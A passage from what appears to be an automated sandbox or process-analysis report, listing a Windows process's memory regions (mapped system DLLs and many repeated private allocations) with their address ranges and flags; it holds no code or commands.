"\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 874 start_va = 0x7ffb27d40000 end_va = 0x7ffb27d9afff monitored = 0 entry_point = 0x7ffb27d538b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 875 start_va = 0x7ffb26590000 end_va = 0x7ffb266abfff monitored = 0 entry_point = 0x7ffb265d02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 876 start_va = 0x400000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 877 start_va = 0x7ffb242c0000 end_va = 0x7ffb243b3fff monitored = 0 entry_point = 0x7ffb242ca960 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 878 start_va = 0x180000000 end_va = 0x1800c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000180000000" filename = "" Region: id = 879 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 880 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 881 start_va = 0x7ffb1a000000 end_va = 0x7ffb1a009fff monitored = 0 entry_point = 0x7ffb1a001350 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 882 start_va = 0x7ffb264f0000 end_va = 0x7ffb2658cfff monitored = 0 entry_point = 0x7ffb264f78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 883 start_va = 0x700000 end_va = 0x89cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 884 start_va = 0x8a0000 end_va = 0xa9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008a0000" filename = "" Region: id = 885 start_va = 0x900000 end_va = 0x9fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000900000" filename = "" Region: id = 886 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 887 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 888 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 889 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 890 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 891 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 892 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 893 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 894 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 895 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 896 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 897 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 898 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 899 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 900 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 901 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 902 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 903 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 904 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 905 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 906 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 907 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 908 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 909 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 910 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 911 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 912 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 913 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 914 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 915 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 916 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 917 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 918 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 919 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 920 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 921 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 922 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 923 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 924 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 925 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 926 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 927 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 928 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 929 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 930 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 931 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 932 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 933 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 934 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 935 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 936 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 937 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 938 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 939 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 940 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 941 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 942 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 943 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 944 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 945 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 946 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 947 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 948 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 949 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 950 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 951 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 952 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 953 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 954 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 955 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 956 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 957 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 958 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 959 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 960 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 961 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 962 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 963 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 964 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 965 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 966 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 967 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 968 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 969 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 970 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 971 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 972 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 973 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 974 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 975 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 976 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 977 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 978 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 979 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 980 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 981 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 982 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 983 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 984 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 985 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 986 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 987 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 988 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 989 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 990 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 991 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 992 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 993 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 994 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 995 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 996 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 997 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 998 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 999 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1000 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1001 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1002 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1003 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1004 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1005 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1006 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1007 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1008 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1009 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1010 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1011 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1012 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1013 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1014 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1015 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1016 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1017 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1018 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1019 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1020 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1021 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1022 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1023 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1024 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1025 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1026 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1027 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1028 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1029 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1030 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1031 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1032 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1033 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1034 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1035 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1036 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1037 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1038 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1039 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1040 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1041 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1042 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1043 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1044 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1045 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1046 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1047 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1048 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1049 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1050 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1051 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1052 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1053 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1054 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1055 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1056 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1057 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1058 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1059 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1060 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1061 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1062 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1063 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1064 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1065 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1066 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1067 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1068 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1069 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1070 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1071 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1072 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1073 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1074 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1075 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1076 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1077 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = 